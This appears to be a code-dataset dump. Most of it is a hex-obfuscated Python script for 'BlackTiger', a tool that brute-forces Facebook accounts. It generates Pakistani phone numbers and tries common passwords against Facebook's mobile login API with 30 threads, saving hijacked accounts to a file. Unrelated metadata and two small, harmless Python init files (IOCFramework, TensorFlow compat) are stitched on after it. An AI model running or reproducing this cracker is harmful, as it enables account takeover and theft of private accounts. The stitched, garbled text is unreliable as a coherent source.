64205C3033335B313B39326D4572726F723430340A5C3033335B313B39346D4E6F204C6F67696E204E656564E29EA3456E6A6F7920776974686F757420616E792070726F626C656D0A5C3033335B313B39356D42546967657220566572792053706565642053637269707420E29EA34F6E6C79206164642050414B20436F756E74727920636F64650A5C3033335B313B39366DE29685E29685E29685E29685E29685E29685E29685E29685E29685E0B991DBA9E28886284572726F7234303429E28886DBA9E0B991E29685E29685E29685E29685E29685E296850A2222220A6C6F676F32203D202222220A5C3033335B313B39316D20202020202020202020202020202020202020202C2E0A5C3033335B313B39326D2020202020202020202020202020202020202C5F3E20602E2020202C273B0A5C3033335B313B39336D20202020202020202020202
020202C2D602720202020202060272020202760272E5F0A5C3033335B313B39346D20202020202020202020202C2C2D29202D2D2D2E5F2020207C2020202E2D2D2D2727602D292C2E0A5C3033335B313B39356D2020202020202020202C27202020202020602E20205C20203B20202F2020205F2C272020202020602C0A5C3033335B313B39366D2020202020202C2D2D27205F5F5F5F202020202020205C2020202720202C27202020205F5F5F2020602D2C0A5C3033335B313B39376D20202020205F3E2020202F2D2D2E20602D2E20202020202020202020202020202E2D272E2D2D5C2020205C5F5F0A5C3033335B313B39376D20202020272D2C20202820202020602E2020602E2C607E205C7E272D2E202C27202C272020202029202020205F5C0A5C3033335B313B39366D202020205F3C202020205C20202020205C202C27202027292029202020602E202F20202020202F202020203C2C2E0A5C3033335B313B39356D202C2D272020205F2C20205C202020202C272020202028202F202020202020602E202020202F2020202020202020602D2C0A5C3033335B313B39346D20602D2E2C2D272020202020602E2C272020202020202060202020202020202020602E2C272020605C202020202C2D270A5C3033335B313B39336D20202C27202020202020205F20202F2020202C2C2C2020202020202C2C2C20202020205C2020202020602D2E20602D2E5F0A5C3033335B313B39326D202F2D2C20202020202C2720203B20202027205F205C202020202F205F206020202020203B20602E20202020206028602D5C0A5C3033335B313B39316D20202F2D2C20202020202020203B20202020286F29202020202020286F292020202020203B202020202020202020206027602C0A5C3033335B313B39316D2C7E2D2720202C2D27202020205C2020202020272020202020202020602020202020202F20202020205C2020202020203C5F0A5C3033335B313B39326D2F2D2E202C2720202020202020205C202020202020202020202020202020202020202F202020202020205C20202020202C2D270A5C3033335B313B39336D202027602C20202020202C27202020602D2F202020202020202020202020205C2D2720602E202020202020602D2E203C0A5C3033335B313B39346D2020202F5F202020202F2020202020202F202020285F20202020205F292020205C202020205C20202020202020202020602C0A5C3033335B313B39356D2020202020602D2E5F3B20202C27207C20202E3A3A2E602D2E2D27203A2E2E20207C20202020202020602D2E202020205F5C0A5C3033335B313B39366D202020202020205F2F202020202020205C2020603A3A202C5E2E203A2E3A27202F206
02E20202020202020205C2C2D270A5C3033335B313B39376D202020202027602E2020202C2D2720202F602D2E2E2D272D2E2D602D2E2E2D275C202020202020202020202020602D2E0A5C3033335B313B39376D202020202020203E5F202F20202020203B2020285C2F28202720295C2F2920203B2020202020602D2E202020205F3C0A5C3033335B313B39366D202020202020202C2D27202020202020602E20205C602D5E5E5E2D272F20202C2720202020202020205C205F3C0A5C3033335B313B39356D2020202020202020602D2C20202C27202020602E206020202020202C27202020602D2E2020203C60270A5C3033335B313B39346D2020202020202020202027292020202020202020602E5F2E2C2C5F2E2720202020202020205C202C2D270A5C3033335B313B39336D2020202020202020202020272E5F202020202020202027602760272020205C202020202020203C0A5C3033335B313B39326D20202020202020202020202020203E2020202C27202020202020202C202020602D2E2020203C60270A5C3033335B313B39316D0A5C3033335B313B39316D2020205F5F5F205F5F5F5F2020205F5F5F205F5F5F5F205F5F5F5F5F5F205F5F5F5F205F5F5F5F20205F5F5F5F5F205F5F205F5F205F20205F2020200A5C3033335B313B39326D20202F205F205C5F5F5F205C202F205F205C5F5F5F205C5F5F5F5F20207C5F5F5F205C5F5F5F205C7C205F5F5F5F2F5F202F5F207C207C7C207C20200A5C3033335B313B39336D207C207C207C207C5F5F29207C207C207C207C5F5F29207C20202F202F20205F5F29207C5F5F29207C207C5F5F20207C207C7C207C207C7C207C5F200A5C3033335B313B39346D207C207C207C207C5F5F203C7C207C207C207C5F5F203C20202F202F20207C5F5F203C7C5F5F203C7C5F5F5F205C207C207C7C207C5F5F2020205F7C0A5C3033335B313B39356D207C207C5F7C207C5F5F29207C207C5F7C207C5F5F29207C2F202F2020205F5F5F29207C5F5F29207C5F5F5F29207C7C207C7C207C20207C207C20200A5C3033335B313B39366D20205C5F5F5F2F5F5F5F5F2F205C5F5F5F2F5F5F5F5F2F2F5F2F2020207C5F5F5F5F2F5F5F5F5F2F7C5F5F5F5F2F207C5F7C7C5F7C20207C5F7C2020200A0A5C3033335B313B39366DE29685E29685E29685E29685E29685E29685E29685E29685E0B991DBA9E2888628426C61636B546967657229E28886DBA9E0B991E29685E29685E29685E29685E29685E296850A5C3033335B313B39346D43726561746572E29EA35C3033335B313B39336D426C61636B54696765722D4572726F723430340A5C3033335B313B39346D5768617473617070E2988F20E29EA35C3033335B313B39336D2B3
932333033373333353131340A5C3033335B313B39346D596F7574756265E29EA35C3033335B313B39336D54696D653420596F750A5C3033335B313B39346D425469676572E29EA34E6F742041204E616D6520497473204272616E64205C3033335B313B39326D4572726F723430340A5C3033335B313B39346D4E6F204C6F67696E204E656564E29EA3456E6A6F7920776974686F757420616E792070726F626C656D0A5C3033335B313B39356D42546967657220566572792053706565642053637269707420E29EA34F6E6C79206164642050414B20436F756E74727920636F64650A5C3033335B313B39366DE29685E29685E29685E29685E29685E29685E29685E29685E29685E0B991DBA9E28886284572726F7234303429E28886DBA9E0B991E29685E29685E29685E29685E29685E296850A0A2222220A0A436F727265637450617373636F6465203D20223033303337333335313134220A0A6C6F6F70203D202774727565270A7768696C6520286C6F6F70203D3D20277472756527293A0A2020202070617373636F6465203D207261775F696E70757428225C3033335B313B39326D5B3F5D205C7831625B313B39376D50415353574F5244205C7831625B313B39376D3A2022290A202020206966202870617373636F6465203D3D20436F727265637450617373636F6465293A0A2020202020202020202020207072696E74202222220A2020202020202020202020205C3033335B313B39326D57656C636F6D6520426C61636B5469676572205A6F6E650A2020202020202020202020202020202020202222220A2020202020202020202020206C6F6F70203D202766616C7365270A20202020656C73653A0A2020202020202020202020207072696E7420225C3033335B313B39316DE298A0EFB88F57524F4E47220A2020202020202020202020206F732E73797374656D28277864672D6F70656E2068747470733A2F2F7777772E796F75747562652E636F6D2F6368616E6E656C2F554371417941454F656461446C4656735A4672617650707727290A0A2323232323204C4943454E53452023232323230A233D3D3D3D3D3D3D3D3D3D3D3D3D3D3D3D3D230A646566206C6973656E736928293A0A202020206F732E73797374656D2827636C65617227290A202020206C6F67696E28290A232323236C6F67696E2323232323232323230A646566206C6F67696E28293A0A202020206F732E73797374656D2827636C65617227290A202020207072696E74206C6F676F310A202020207072696E7420225C3033335B313B39336D5B315D5C7831625B313B39346D537461727420636C6F6E696E672028206E6F206C6F67696E2029220A2020202074696D652E736C65657028302E3
035290A202020207072696E7420275C7831625B313B39336D5B305D5C3033335B313B39346D20457869742028436F6D696E6720536F6F6E29270A2020202070696C69685F6C6F67696E28290A0A6465662070696C69685F6C6F67696E28293A0A202020207065616B203D207261775F696E70757428225C6E5C3033335B313B39356D43484F4F53453A205C3033335B313B39356D22290A202020206966207065616B203D3D22223A0A20202020202020207072696E7420225C7831625B313B39356D46696C6C20496E20436F72726563746C79220A202020202020202070696C69685F6C6F67696E28290A20202020656C6966207065616B203D3D2231223A0A20202020202020205A65656B28290A646566205A65656B28293A0A202020206F732E73797374656D2827636C65617227290A202020207072696E74206C6F676F310A202020207072696E7420275C7831625B313B39346D5B315D20426C61636B546967657220537461727420437261636B696E67270A2020202074696D652E736C65657028302E3035290A202020207072696E7420275C7831625B313B39346D5B305D205C3033335B313B39336D204261636B270A2020202074696D652E736C65657028302E3035290A20202020616374696F6E28290A0A64656620616374696F6E28293A0A202020207065616B203D207261775F696E70757428275C6E5C3033335B313B39356D43484F4F53453A5C3033335B313B39376D27290A202020206966207065616B203D3D27273A0A20202020202020207072696E7420275B215D2046696C6C20496E20436F72726563746C79270A2020202020202020616374696F6E28290A20202020656C6966207065616B203D3D2231223A20202020202020202020202020200A20202020202020206F732E73797374656D2822636C65617222290A20202020202020207072696E74206C6F676F320A20202020202020207072696E742022456E74657220616E792050616B697374616E69204D6F62696C6520636F6465204E756D626572222B275C6E270A20202020202020207072696E742027426C61636B546967657220456E74657220616E7920636F6465203120746F203439270A20202020202020207472793A0A20202020202020202020202063203D207261775F696E70757428225C3033335B313B39366D43484F4F5345203A2022290A2020202020202020202020206B3D223033220A20202020202020202020202069646C697374203D2028272E74787427290A202020202020202020202020666F72206C696E6520696E206F70656E2869646C6973742C227222292E726561646C696E657328293A0A2020202020202020202020202020202069642E617070656E64286C696E6
52E73747269702829290A202020202020202065786365707420494F4572726F723A0A2020202020202020202020207072696E742028225B215D2046696C65204E6F7420466F756E6422290A2020202020202020202020207261775F696E70757428225C6E5B204261636B205D22290A202020202020202020202020626C61636B6D616669617828290A20202020656C6966207065616B203D3D2730273A0A20202020202020206C6F67696E28290A20202020656C73653A0A20202020202020207072696E7420275B215D2046696C6C20496E20436F72726563746C79270A2020202020202020616374696F6E28290A202020207072696E742035302A20275C3033335B313B39316D2D270A20202020787878203D20737472286C656E28696429290A202020206A616C616E2028275C3033335B313B39316D20546F74616C20696473206E756D6265723A20272B787878290A202020206A616C616E2028275C3033335B313B39326D436F646520796F752063686F6F73653A20272B63290A202020206A616C616E2028225C3033335B313B39326D426C61636B5469676572E29688E29688E29688E29688E29688E29688E29692E29692E296922E2E393925537461727420437261636B696E672E2E2E22290A202020206A616C616E2028225C3033335B313B39326D546F2053746F702050726F63657373205072657373204374726C2B7A22290A202020207072696E742035302A20275C3033335B313B39316D2D270A20202020646566206D61696E28617267293A0A2020202020202020676C6F62616C206370622C6F6B730A202020202020202075736572203D206172670A20202020202020207472793A0A2020202020202020202020206F732E6D6B64697228277361766527290A2020202020202020657863657074204F534572726F723A0A202020202020202020202020706173730A20202020202020207472793A0A2020202020202020202020207061737331203D20757365720A20202020202020202020202064617461203D2062722E6F70656E282768747470733A2F2F622D6170692E66616365626F6F6B2E636F6D2F6D6574686F642F617574682E6C6F67696E3F6163636573735F746F6B656E3D32333737353939303935393136353525323532353743306631343061616265646662363561633237613733396564316132323633623126666F726D61743D6A736F6E2673646B5F76657273696F6E3D3126656D61696C3D27202B6B2B632B757365722B2027266C6F63616C653D656E5F55532670617373776F72643D27202B207061737331202B20272673646B3D696F732667656E65726174655F73657373696F6E5F636F6F6B6965733D31267369673D336635353566393
866623631666364376161306334346635386635323265666D27290A20202020202020202020202071203D206A736F6E2E6C6F61642864617461290A202020202020202020202020696620276163636573735F746F6B656E2720696E20713A0A202020202020202020202020202020207072696E7420275C7831625B313B39326D284F4B29202027202B206B202B2063202B2075736572202B202720207C202027202B2070617373312020202020202020202020202020202020202020202020202020202020202020202020202020200A202020202020202020202020202020206F6B62203D206F70656E2827736176652F636C6F6E65642E747874272C20276127290A202020202020202020202020202020206F6B622E7772697465286B2B632B757365722B70617373312B275C6E27290A202020202020202020202020202020206F6B622E636C6F736528290A202020202020202020202020202020206F6B732E617070656E6428632B757365722B7061737331290A202020202020202020202020656C73653A0A20202020202020202020202020202020696620277777772E66616365626F6F6B2E636F6D2720696E20715B276572726F725F6D7367275D3A0A20202020202020202020202020202020202020207072696E7420275C3033335B313B39376D284350292027202B206B202B2063202B2075736572202B202720207C202027202B2070617373310A2020202020202020202020202020202020202020637073203D206F70656E2827736176652F636C6F6E65642E747874272C20276127290A20202020202020202020202020202020202020206370732E7772697465286B2B632B757365722B70617373312B275C6E27290A20202020202020202020202020202020202020206370732E636C6F736528290A20202020202020202020202020202020202020206370622E617070656E6428632B757365722B7061737331290A20202020202020202020202020202020656C73653A0A20202020202020202020202020202020202020207061737332203D206B202B2063202B20757365720A202020202020202020202020202020202020202064617461203D2062722E6F70656E282768747470733A2F2F622D6170692E66616365626F6F6B2E636F6D2F6D6574686F642F617574682E6C6F67696E3F6163636573735F746F6B656E3D32333737353939303935393136353525323532353743306631343061616265646662363561633237613733396564316132323633623126666F726D61743D6A736F6E2673646B5F76657273696F6E3D3126656D61696C3D27202B6B2B632B757365722B2027266C6F63616C653D656E5F55532670617373776F72643D27202B20706173733
2202B20272673646B3D696F732667656E65726174655F73657373696F6E5F636F6F6B6965733D31267369673D336635353566393866623631666364376161306334346635386635323265666D27290A202020202020202020202020202020202020202071203D206A736F6E2E6C6F61642864617461290A2020202020202020202020202020202020202020696620276163636573735F746F6B656E2720696E20713A0A2020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39326D284F4B29202027202B206B202B2063202B2075736572202B20202720207C202027202B2070617373320A2020202020202020202020202020202020202020202020206F6B62203D206F70656E2827736176652F636C6F6E65642E747874272C20276127290A2020202020202020202020202020202020202020202020206F6B622E7772697465286B2B632B757365722B70617373322B275C6E27290A2020202020202020202020202020202020202020202020206F6B622E636C6F736528290A2020202020202020202020202020202020202020202020206F6B732E617070656E6428632B757365722B7061737332290A2020202020202020202020202020202020202020656C73653A0A202020202020202020202020202020202020202020202020696620277777772E66616365626F6F6B2E636F6D2720696E20715B276572726F725F6D7367275D3A0A202020202020202020202020202020202020202020202020202020207072696E7420275C3033335B313B39376D284350292027202B206B202B2063202B2075736572202B202720207C202027202B2070617373320A20202020202020202020202020202020202020202020202020202020637073203D206F70656E2827736176652F636C6F6E65642E747874272C20276127290A202020202020202020202020202020202020202020202020202020206370732E7772697465286B2B632B757365722B70617373322B275C6E27290A202020202020202020202020202020202020202020202020202020206370732E636C6F736528290A202020202020202020202020202020202020202020202020202020206370622E617070656E6428632B757365722B7061737332290A202020202020202020202020202020202020202020202020656C73653A0A2020202020202020202020202020202020202020202020202020202070617373333D22303030373836220A2020202020202020202020202020202020202020202020202020202064617461203D2062722E6F70656E282768747470733A2F2F622D6170692E66616365626F6F6B2E636F6D2F6D6574686F642F617574682E6C6F67696E3F616
3636573735F746F6B656E3D32333737353939303935393136353525323532353743306631343061616265646662363561633237613733396564316132323633623126666F726D61743D6A736F6E2673646B5F76657273696F6E3D3126656D61696C3D27202B6B2B632B757365722B2027266C6F63616C653D656E5F55532670617373776F72643D27202B207061737333202B20272673646B3D696F732667656E65726174655F73657373696F6E5F636F6F6B6965733D31267369673D336635353566393866623631666364376161306334346635386635323265666D27290A2020202020202020202020202020202020202020202020202020202071203D206A736F6E2E6C6F61642864617461290A20202020202020202020202020202020202020202020202020202020696620276163636573735F746F6B656E2720696E20713A0A20202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39326D284F4B29202027202B206B202B2063202B2075736572202B202720207C202027202B2070617373330A20202020202020202020202020202020202020202020202020202020202020206F6B62203D206F70656E2827736176652F636C6F6E65642E747874272C20276127290A20202020202020202020202020202020202020202020202020202020202020206F6B622E7772697465286B2B632B757365722B70617373332B275C6E27290A20202020202020202020202020202020202020202020202020202020202020206F6B622E636C6F736528290A20202020202020202020202020202020202020202020202020202020202020206F6B732E617070656E6428632B757365722B7061737333290A20202020202020202020202020202020202020202020202020202020656C73653A0A2020202020202020202020202020202020202020202020202020202020202020696620277777772E66616365626F6F6B2E636F6D2720696E20715B276572726F725F6D7367275D3A0A2020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C3033335B313B39376D284350292027202B206B202B2063202B2075736572202B202720207C202027202B207061737333200A202020202020202020202020202020202020202020202020202020202020202020202020637073203D206F70656E2827736176652F636C6F6E65642E747874272C20276127290A2020202020202020202020202020202020202020202020202020202020202020202020206370732E7772697465286B2B632B757365722B70617373332B275C6E27290A202020202020202020202020202020202
0202020202020202020202020202020202020206370732E636C6F736528290A2020202020202020202020202020202020202020202020202020202020202020202020206370622E617070656E6428632B757365722B7061737333290A2020202020202020202020202020202020202020202020202020202020202020656C73653A0A20202020202020202020202020202020202020202020202020202020202020202020202070617373343D2250616B697374616E220A20202020202020202020202020202020202020202020202020202020202020202020202064617461203D2062722E6F70656E282768747470733A2F2F622D6170692E66616365626F6F6B2E636F6D2F6D6574686F642F617574682E6C6F67696E3F6163636573735F746F6B656E3D32333737353939303935393136353525323532353743306631343061616265646662363561633237613733396564316132323633623126666F726D61743D6A736F6E2673646B5F76657273696F6E3D3126656D61696C3D27202B6B2B632B757365722B2027266C6F63616C653D656E5F55532670617373776F72643D27202B207061737334202B20272673646B3D696F732667656E65726174655F73657373696F6E5F636F6F6B6965733D31267369673D336635353566393866623631666364376161306334346635386635323265666D27290A20202020202020202020202020202020202020202020202020202020202020202020202071203D206A736F6E2E6C6F61642864617461290A202020202020202020202020202020202020202020202020202020202020202020202020696620276163636573735F746F6B656E2720696E20713A0A202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39326D284F4B29202027202B206B202B2063202B2075736572202B202720207C202027202B207061737334200A202020202020202020202020202020202020202020202020202020202020202020202020202020206F6B62203D206F70656E2827736176652F636C6F6E65642E747874272C20276127290A202020202020202020202020202020202020202020202020202020202020202020202020202020206F6B622E7772697465286B2B632B757365722B70617373342B275C6E27290A202020202020202020202020202020202020202020202020202020202020202020202020202020206F6B622E636C6F736528290A202020202020202020202020202020202020202020202020202020202020202020202020202020206F6B732E617070656E6428632B757365722B7061737334290A202020202020202020202020202020202
020202020202020202020202020202020202020656C73653A0A20202020202020202020202020202020202020202020202020202020202020202020202020202020696620277777772E66616365626F6F6B2E636F6D2720696E20715B276572726F725F6D7367275D3A0A20202020202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C3033335B313B39376D284350292027202B206B202B2063202B2075736572202B202720207C202027202B2070617373340A2020202020202020202020202020202020202020202020202020202020202020202020202020202020202020637073203D206F70656E2827736176652F636C6F6E65642E747874272C20276127290A20202020202020202020202020202020202020202020202020202020202020202020202020202020202020206370732E7772697465286B2B632B757365722B70617373342B275C6E27290A20202020202020202020202020202020202020202020202020202020202020202020202020202020202020206370732E636C6F736528290A20202020202020202020202020202020202020202020202020202020202020202020202020202020202020206370622E617070656E6428632B757365722B7061737334290A20202020202020202020202020202020202020202020202020202020202020202020202020202020656C73653A0A202020202020202020202020202020202020202020202020202020202020202020202020202020202020202070617373353D22373836373836220A202020202020202020202020202020202020202020202020202020202020202020202020202020202020202064617461203D2062722E6F70656E282768747470733A2F2F622D6170692E66616365626F6F6B2E636F6D2F6D6574686F642F617574682E6C6F67696E3F6163636573735F746F6B656E3D32333737353939303935393136353525323532353743306631343061616265646662363561633237613733396564316132323633623126666F726D61743D6A736F6E2673646B5F76657273696F6E3D3126656D61696C3D27202B6B2B632B757365722B2027266C6F63616C653D656E5F55532670617373776F72643D27202B207061737335202B20272673646B3D696F732667656E65726174655F73657373696F6E5F636F6F6B6965733D31267369673D336635353566393866623631666364376161306334346635386635323265666D27290A202020202020202020202020202020202020202020202020202020202020202020202020202020202020202071203D206A736F6E2E6C6F61642864617461290A20202020202020202020202020202
02020202020202020202020202020202020202020202020202020202020696620276163636573735F746F6B656E2720696E20713A0A2020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C7831625B313B39326D284F4B29202027202B206B202B2063202B2075736572202B202720207C202027202B2070617373350A2020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020206F6B62203D206F70656E2827736176652F636C6F6E65642E747874272C20276127290A2020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020206F6B622E7772697465286B2B632B757365722B70617373352B275C6E27290A2020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020206F6B622E636C6F736528290A2020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020206F6B732E617070656E6428632B757365722B7061737335290A2020202020202020202020202020202020202020202020202020202020202020202020202020202020202020656C73653A0A202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020696620277777772E66616365626F6F6B2E636F6D2720696E20715B276572726F725F6D7367275D3A0A202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020207072696E7420275C3033335B313B39376D284350292027202B206B202B2063202B2075736572202B202720207C202027202B207061737335200A20202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020637073203D206F70656E2827736176652F636C6F6E65642E747874272C20276127290A202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020206370732E7772697465286B2B632B757365722B70617373352B275C6E27290A202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020206370732E636C6F736528290A202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020206370622E617070656E642
8632B757365722B7061737335290A202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020200A202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020200A2020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020200A2020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020200A202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202
0202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020200A2020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020200A2020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020200A0A0A2020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020200A20202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020200A20202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202
02020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020200A0A0A0A20202020202020206578636570743A0A202020202020202020202020706173730A20202020202020200A2020202070203D20546872656164506F6F6C283330290A20202020702E6D6170286D61696E2C206964290A202020207072696E742035302A20275C3033335B313B39316D2D270A202020207072696E742027426C61636B54696765722050726F6365737320486173204265656E20436F6D706C65746564E29688E29688E29688E29688E29688E29688E29692E29692E29692E296922E2E2E31303025270A202020207072696E742027546F74616C204F4B2F4350203A20272B737472286C656E286F6B7329292B272F272B737472286C656E2863706229290A202020207072696E742827426C61636B546967657220436C6F6E6564204163636F756E747320486173204265656E205361766564203A20736176652F636C6F6E65642E74787427290A202020206A616C616E28224E6F7465203A20596F757220426C61636B5469676572284350294163636F756E7473204F70656E206166746572203520746F2038206461797322290A202020207072696E742027270A202020207072696E74202222220A202020200A202020200A202020200A202020200A0A5C3033335B313B39316D5468616E6B73205C3033335B313B39376D557365696E67204D7920426C61636B546967657220546F6F6C0A5C3033335B313B39326D204D79205768617473617070204E6F5C3033335B313B39376D2B3932333033373333353131340A5C3033335B313B39336D4769744875625C3033335B313B39376D426C61636B54696765722D4572726F723430340A5C3033335B313B3934596F75547562655C3033335B313B39376DE2888654696D653420596F752222220A0A202020200A202020207261775F696E70757428225C6E5C3033335B313B39326D5B5C3033335B313B39326D4261636B5C3033335B313B39356D5D22290A202020206C6F67696E2829200A202020202020202020200A6966205F5F6E616D655F5F203D3D20275F5F6D61696E5F5F273A0A202020206C6F67696E28290A0A0A'))
| 12,575
| 37,710
| 0.999735
| 6
| 37,725
| 6,285.833333
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.889746
| 0.00008
| 37,725
| 2
| 37,711
| 18,862.5
| 0.110068
| 0
| 0
| 0
| 0
| 0
| 0.998913
| 0.998913
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 12
|
0c339e303e81938df230a1a93f38a3009926afbc
| 114
|
py
|
Python
|
IOCFramework/src/__init__.py
|
Dino16m/iocframework
|
a724923d3835554711017986d2bea04b0bc33232
|
[
"MIT"
] | 1
|
2020-08-27T07:57:02.000Z
|
2020-08-27T07:57:02.000Z
|
build/lib/IOCFramework/src/__init__.py
|
Dino16m/iocframework
|
a724923d3835554711017986d2bea04b0bc33232
|
[
"MIT"
] | null | null | null |
build/lib/IOCFramework/src/__init__.py
|
Dino16m/iocframework
|
a724923d3835554711017986d2bea04b0bc33232
|
[
"MIT"
] | null | null | null |
from .app import App
from .resolve import resolve_obj
def get_app(resolver=resolve_obj):
    """Build and return an App configured with *resolver* (defaults to resolve_obj)."""
    application = App(resolver)
    return application
| 22.8
| 34
| 0.789474
| 18
| 114
| 4.833333
| 0.5
| 0.229885
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.140351
| 114
| 5
| 35
| 22.8
| 0.887755
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.5
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
a752e31fab4e5418938671fd51350ad39c3df32a
| 1,155
|
py
|
Python
|
Plugins/UnrealEnginePython/Binaries/Win64/Lib/site-packages/tensorflow/_api/v1/compat/__init__.py
|
JustinACoder/H22-GR3-UnrealAI
|
361eb9ef1147f8a2991e5f98c4118cd823184adf
|
[
"MIT"
] | 6
|
2022-02-04T18:12:24.000Z
|
2022-03-21T23:57:12.000Z
|
Lib/site-packages/tensorflow/_api/v1/compat/__init__.py
|
shfkdroal/Robot-Learning-in-Mixed-Adversarial-and-Collaborative-Settings
|
1fa4cd6a566c8745f455fc3d2273208f21f88ced
|
[
"bzip2-1.0.6"
] | null | null | null |
Lib/site-packages/tensorflow/_api/v1/compat/__init__.py
|
shfkdroal/Robot-Learning-in-Mixed-Adversarial-and-Collaborative-Settings
|
1fa4cd6a566c8745f455fc3d2273208f21f88ced
|
[
"bzip2-1.0.6"
] | 1
|
2022-02-08T03:53:23.000Z
|
2022-02-08T03:53:23.000Z
|
# This file is MACHINE GENERATED! Do not edit.
# Generated by: tensorflow/python/tools/api/generator/create_python_api.py script.
"""Functions for Python 2 vs. 3 compatibility.
## Conversion routines
In addition to the functions below, `as_str` converts an object to a `str`.
## Types
The compatibility module also provides the following types:
* `bytes_or_text_types`
* `complex_types`
* `integral_types`
* `real_types`
"""
from __future__ import print_function
from tensorflow.python.compat.compat import forward_compatibility_horizon
from tensorflow.python.compat.compat import forward_compatible
from tensorflow.python.util.compat import as_bytes
from tensorflow.python.util.compat import as_str
from tensorflow.python.util.compat import as_str as as_text
from tensorflow.python.util.compat import as_str_any
from tensorflow.python.util.compat import bytes_or_text_types
from tensorflow.python.util.compat import complex_types
from tensorflow.python.util.compat import integral_types
from tensorflow.python.util.compat import path_to_str
from tensorflow.python.util.compat import real_types
del print_function
| 33.970588
| 83
| 0.805195
| 166
| 1,155
| 5.409639
| 0.361446
| 0.213808
| 0.244989
| 0.240535
| 0.5
| 0.5
| 0.459911
| 0.136971
| 0
| 0
| 0
| 0.001988
| 0.129004
| 1,155
| 33
| 84
| 35
| 0.890656
| 0.361905
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.923077
| 0
| 0.923077
| 0.153846
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
a75591b3d3dc8f9fc7200a49b52ecbe39f78c5df
| 241
|
py
|
Python
|
app/utils/statistics.py
|
TUIASI-AC-enaki/flappy-bird-with-ai
|
e1b70108b0e6a548033dc1845fabcd5459fb2cbe
|
[
"MIT"
